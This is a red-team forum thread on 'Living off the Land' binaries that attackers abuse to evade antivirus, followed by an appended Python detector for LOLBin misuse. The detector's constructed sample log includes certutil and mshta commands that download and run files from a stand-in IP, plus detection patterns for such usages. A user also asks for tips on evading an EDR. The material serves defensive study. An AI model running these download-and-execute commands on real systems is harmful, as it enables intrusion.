this post was submitted on 16 Jun 2023
6 points (100.0% liked)
Red Team
Red Teamers are here to break into your stuff before the bad guys do, and help you secure it. This is a place to discuss novel research, pentest tools and techniques, physical security and post memes about the Blue Team.
Join us! We have cookies. Blue Team's cookies. >:)
So LOL means "Living off the Land", which basically means using whatever is on the system instead of bringing your own tools. There are many binaries built into both Linux and Windows which you can use to download, execute, etc., and since they are also legitimate tools, AV, EDR, etc. are less likely to detect them while you leverage existing tools. Keeping track of these binaries is a pain, so this nice little website just has everything there, which makes it a lot easier.
I don't think I explained well, but here are some articles:
https://res.armor.com/resources/threat-intelligence/living-off-the-land-attacks/
https://www.securityhq.com/blog/security-101-lolbins-malware-exploitation/
https://darktrace.com/blog/living-off-the-land-how-hackers-blend-into-your-environment
There is also "Staying off the Land" and "Bring your own Land". It's really fascinating.
Ah, that makes perfect sense, thanks! Some EDRs will flag system binaries that are not in the "standard" folder, though. I was trying to chain a few binaries together (not for red teaming or anything like that), and S1 flagged and deleted all of them from my folder. It was very frustrating.
Unfortunately, it is a lot of trial and error.
That makes sense. This may be a loaded question, but do you have any suggestions?
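As an added illustration of the two points raised in this thread (LOLBins being ordinary system binaries abused to download and run things, and an EDR flagging a system binary that is running from somewhere other than its standard folder), here is a small Python detector that is not part of the thread or any commenter's tooling. It runs over a constructed, Sysmon-style process-creation log (the fields `ProcessId`, `Image` and `CommandLine` and the sample lines are assumptions made for the example) and flags a known LOLBin either running from outside its expected directory or invoked with a documented download/execute command-line shape. The binary list and patterns are an illustrative subset, not a complete ruleset.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Where a handful of well-known Windows LOLBins normally live. Illustrative
# subset chosen for the example; the LOLBAS project catalogues many more.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
EXPECTED_DIRS = {
    "certutil.exe": SYSTEM_DIRS,
    "bitsadmin.exe": SYSTEM_DIRS,
    "mshta.exe": SYSTEM_DIRS,
    "regsvr32.exe": SYSTEM_DIRS,
    "rundll32.exe": SYSTEM_DIRS,
}

# Command-line shapes corresponding to documented download/execute usages.
SUSPICIOUS_CMDLINES = [
    ("certutil.exe", re.compile(r"-urlcache\b.*https?://", re.I), "certutil used to fetch a URL"),
    ("bitsadmin.exe", re.compile(r"/transfer\b", re.I), "bitsadmin transfer job"),
    ("mshta.exe", re.compile(r"https?://|\b(?:javascript|vbscript):", re.I), "mshta with remote or inline script"),
    ("regsvr32.exe", re.compile(r"/i:https?://", re.I), "regsvr32 loading a remote scriptlet"),
]


@dataclass(frozen=True)
class Finding:
    pid: int
    image: str
    reason: str


def parse_log(text):
    """Parse key="value" process-creation lines (assumed format) into dicts."""
    events = []
    for line in text.strip().splitlines():
        fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
        if {"ProcessId", "Image", "CommandLine"}.issubset(fields):
            events.append(fields)
    return events


def analyze_event(ev):
    """Return findings for one event: bad location and/or suspicious usage."""
    path = PureWindowsPath(ev["Image"])
    name = path.name.lower()
    parent = str(path.parent).lower()
    pid = int(ev["ProcessId"])
    findings = []
    # Check 1: a known LOLBin executing from a non-standard directory
    # (the copied-binary case an EDR tends to flag).
    if name in EXPECTED_DIRS and parent not in EXPECTED_DIRS[name]:
        findings.append(Finding(pid, ev["Image"], f"{name} running from unexpected directory {parent}"))
    # Check 2: a known LOLBin invoked in a documented download/execute shape.
    for lolbin, pattern, label in SUSPICIOUS_CMDLINES:
        if name == lolbin and pattern.search(ev["CommandLine"]):
            findings.append(Finding(pid, ev["Image"], label))
    return findings


def analyze(events):
    return [f for ev in events for f in analyze_event(ev)]


# Constructed sample log, not real telemetry; 198.51.100.0/24 is a
# documentation range. Line 1001 and 1005 are benign uses, 1002 and 1004
# are download-style invocations, 1003 is certutil copied to a user folder.
SAMPLE_LOG = r'''
ProcessId="1001" Image="C:\Windows\System32\certutil.exe" CommandLine="certutil.exe -hashfile C:\Users\bob\setup.msi SHA256"
ProcessId="1002" Image="C:\Windows\System32\certutil.exe" CommandLine="certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\Users\Public\p.txt"
ProcessId="1003" Image="C:\Users\bob\tools\certutil.exe" CommandLine="certutil.exe -hashfile C:\Users\bob\setup.msi SHA256"
ProcessId="1004" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe https://198.51.100.7/x.hta"
ProcessId="1005" Image="C:\Windows\System32\rundll32.exe" CommandLine="rundll32.exe shell32.dll,Control_RunDLL"
'''

if __name__ == "__main__":
    for f in analyze(parse_log(SAMPLE_LOG)):
        print(f"pid {f.pid}: {f.reason} [{f.image}]")
```

The path check is only a heuristic: a real EDR will usually also consider the file's signature and hash, which is why a copied, unmodified system binary still gets caught even when the command line looks harmless, as described in the thread.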